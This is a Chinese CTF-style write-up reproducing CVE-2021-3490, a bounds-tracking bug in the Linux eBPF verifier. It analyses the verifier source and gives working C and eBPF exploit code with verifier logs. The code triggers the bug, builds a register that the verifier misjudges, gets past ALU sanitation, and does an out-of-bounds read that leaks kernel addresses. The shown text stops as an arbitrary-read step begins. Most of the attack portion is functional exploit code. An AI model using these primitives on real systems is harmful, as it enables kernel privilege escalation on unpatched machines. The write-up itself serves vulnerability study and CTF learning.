0%

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{yhellow}" > /flag
chmod 666 /flag

setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_valuesmax_value:64 位有符号的值的可能取值边界
  • umin_valueumax_value:64 位无符号的值的可能取值边界
  • s32_min_values32_max_value:32 位有符号的值的可能取值边界
  • u32_min_valueu32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
struct tnum {
u64 value;
u64 mask;
};
  • value & mask 表示这个寄存器中可以确定的值

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 处理32位(漏洞函数) */
scalar_min_max_and(dst_reg, &src_reg); /* 处理64位 */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
__reg_deduce_bounds(dst_reg); /* 边界调整校验 */
__reg_bound_offset(dst_reg); /* 基于边界值范围重新计算var_off的值 */
return 0;
}

cve 的漏洞点位于函数 scalar32_min_max_and,其中的 BPF_AND \ BPF_OR \ BPF_XOR 三类操作有问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器低32位的值(是否为'0') */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的低32位值,并且分别获取src_reg的s32_min_value和u32_max_value */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/* 如果src_reg和dst_reg的值都已经确定,那么则直接返回(因为64位时还会进行更新) */
if (src_known && dst_known)
return;

/* 使用var32_off的值来更新dst_reg的u32_min_value和u32_max_value */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* 同为负则用src_reg的最大最小值 */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* 否则用dst_reg的u32_min_value和u32_max_value更新 */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器(是否为'0') */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的值,并且分别获取src_reg的smin_value和umax_value */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* 如果src_reg和dst_reg的值都已经确定,那么更新边界值 */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个已经确定的寄存器,简单的调用 tnum_const 设置寄存器 var_offknown,并给对应边界赋值
1
2
3
4
5
6
7
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_andscalar_min_max_and 中判断寄存器是否 known 的条件不同,导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(由于 R2.var_off.value=0 < R2.u32_max_value=1
    • 设置 R2.u32_min_value=0x1(由于 R2.var_off.value=0 < R2.u32_min_value=1
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define POC_PROG(__map_fd) \
/* Load value from map */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \ /* r9 = 0 */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \ /* r1 = r9 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ /* r2 = r10(rbp) */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \ /* r2 += -8 */
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \ /* *(r2 + 0) = 0 */
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ /* if r0 != 0x0 goto pc+1 */
BPF_EXIT_INSN(), \ /* jmp exit */
/* load value into r2, make it part-unknown */ \
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), \ /* r2 = *(r0 + 0) */
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \ /* r4 = -1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \ /* r4 <<= 32 */
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4), \ /* r2 &= r4 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1), \ /* r2 += 1 */
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \ /* r3 = 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \ /* r3 <<= 32 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \ /* r3 += 2 */
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3) /* r2 &= r3 */


int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

struct bpf_insn prog[] = {
POC_PROG(map_fd),
BPF_EXIT_INSN()
};
run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define VULN_REG    BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1] ,32位运行时值为 0 寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1& 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中的每一条指令前面都添加上额外的辅助指令
1
2
3
4
5
6
7
8
9
10
11
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000R7 = value[0x1000]alu_limit = 0x1000
  • 将 R8 乘上 0x1000R8 = 0x1000
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110R7 = value[-0x110]alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
......
};

